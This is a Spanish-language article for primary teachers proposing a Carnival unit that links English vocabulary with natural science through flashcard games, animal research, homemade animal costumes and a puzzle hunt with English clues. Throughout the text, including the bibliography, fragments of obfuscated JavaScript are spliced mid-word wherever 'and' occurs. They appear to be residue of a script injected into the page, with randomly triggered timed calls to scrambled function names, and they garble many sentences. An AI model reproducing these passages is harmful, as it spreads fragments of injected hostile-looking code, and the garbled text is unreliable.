¿CÓMO INTEGRAR LOS IDIOMAS CON LA NATURALEZA Y EL CARNAVAL?

Autora: María Benítez Sanz

         Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando todos los años se acercan estas fechas, me refiero a los Carnavales, todos los colegios se visten de fiesta, luz, color, diversión y sobre todo ilusión, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando vemos reflejada en las caras de nuestros alumnos esa sonrisa motivada por poder ser por una vez al año ese ídolo que tanto veneran como Spiderman, ese personaje que tanto adoran como Bob Esponja o bien disfrazándose de cualquier otra que les haga pasar un rato divertido.

         A nosotros, como maestros, nos llena de satisfacción la alegría que muestran nuestros alumnos esos días, pero ¿pueden ser los carnavales también un motivo de aprendizaje?, ¿puede tener esta festividad una finalidad didáctica? A través de este artículo daremos algunas claves para integrar dos áreas importantes como el inglés y el conocimiento del medio en esta festividad.

           El carnaval es una festividad que puede ser aprovechada como el trasfondo de una aplicación didáctica. Imaginemos que queremos trabajar interdisciplinarmente los idiomas, en nuestro caso, el inglés, con la naturaleza representada a través del área de Conocimiento del Medio natural y social. Pues bien, el Carnaval se convierte aquí en el eslabón perfecto para trabajar las dos áreas conjuntamente. Nuestra idea sería realizar un proyecto, un proyecto sobre la naturaleza, en la que incluiremos tanto los animales como las plantas. Para ello, podemos realizar varias actividades que formarán parte de una unidad didáctica interdisciplinar sobre el Carnaval en la cual podemos realizar las siguientes actividades que vamos a proponer:

1.- Para comenzar por el área de Inglés podemos presentar a los alumnos el vocabulario con el que vamos a trabajar tanto de animales como de plantas: palabras como frog (rana), lion (león), rabbit (conejo) o tree( árbol), strawberries ( fresas), etc. Podemos realizar varios ejercicios de asimilación de estos conceptos realizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando juegos con las flashcards, como un juego de memoria donde tienen que ordenar las tarjetas de vocabulario tal como estaban al principio, podemos jugar a veo veo en inglés, también llamado I spy with my little eye”, al juego del ahorcado o  la flashcard perdida or What´s the missing flashcard? donde los alumnos tendrán que averiguar qué flashcard ha desaparecido de aquellas que coloquemos en la pizarra.

2.- Una vez reconocido el vocabulario en inglés, podemos aprender más datos sobre los animales. Para ello, dedicaremos dos o tres sesiones y  en grupos de cuatro buscaremos información sobre un determinado animal haciendo uso de libros de consulta y de internet e investigandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sobre tres aspectos: qué comen, dónde viven y por cuántos años viven. Este mismo ejercicio se puede realizar para el área de Inglés, escribiendo y traduciendo estos datos para crear una tabla en la que aparecerían estas referencias: what they eat ( qué comen), where they live ( dónde viven) andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and for how long they live ( su esperanza de vida). Con esta actividad, los alumnos se sentirán muy motivados, pues aprenderán nuevos datos sobre sus animales favoritos, al mismo tiempo que aprenderán en inglés nuevas palabras y expresiones.

3. En las siguientes sesiones previas al Carnaval, nos dedicaremos a realizar los trajes de Carnaval sobre los animales. Para ello, se asignará a cada alumno un animal, por ejemplo, uno será el conejo, otro el león, otro el tigre, otro el elefante, etc. Cada alumno realizará su propia careta o máscara ayudado por el profesor, la cual consistirá en una cara de un animal hecha a modo de cartulina y folio. Después para el traje, utilizaremos bolsas de basura de colores, las cuales adornaremos con los elementos característicos de cada animal: ancas de rana, manchas de jirafa, etc, tal como se muestra en las siguientes fotografías:


 

4.- Una vez realizados los trajes de Carnaval, el mismo día que celebremos la fiesta en el colegio, realizaremos actividades relacionadas con el carnaval, como un desfile de disfraces, un circuito, el baile de las sillas, el baile de la escoba, etc. Pero a partir de estas actividades, vamos a realizar un juego de investigación por grupos que tratará de trabajar la competencia de interacción con el medio físico y el medio ambiente. Esta actividad, relacionada con la naturaleza y también con los idiomas, se realizará al aire libre. Para ello, dividiremos la clase en tres grupos. Cada grupo tendrá que buscar las piezas de un puzle que forman la cara de un animal y que se encontrarán escondidas por diferentes partes del colegio. Para llegar a encontrar esas piezas, en total diez, entregaremos a nuestros alumnos una serie de pistas sencillas en inglés como por ejemplo: look for something orange ( busca algo naranja) o It is next to the window ( está cerca de la ventana) y así sucesivamente. Esta actividad con las pistas en inglés estaría más bien orientada para 5º y 6º de primaria; para niveles más bajos, podemos hacer la misma actividad pero con las pistas en español. Una vez encontradas las piezas del puzle, cada grupo se dispondrá a montarlo y el que termine antes será el ganador. Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los grupos encuentran piezas que no son de su puzle podrán llegar a un acuerdo con otro grupo para intercambiar las piezas y así formar lo antes posible el puzle.

         Como vemos, con este tipo de actividades no solo trabajamos el área de conocimiento del medio, también los idiomas; trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando así la competencia lingüística, la de aprender a aprender, la autonomía e iniciativa personal en la realización de sus propios trajes o en la búsqueda del puzle, la competencia de interacción con el mundo físico y la competencia matemática al trabajar con puzles.


 

BIBLIOGRAFÍA:

  • -Ellis andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Brewster’s book, The Primary English Teacher’s Guide, published by Penguin in 2002 (new edition).
  • - Carrier, et al 1980, Games andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and activities for the language learner, London Harrap
  • -Real Decreto 1513/2006, de 7 Diciembre, por el que se establecen las enseñanzas mínimas de la Educación Primaria, BOE, número 293 de 8/12/2006, páginas 43053 a 43102.

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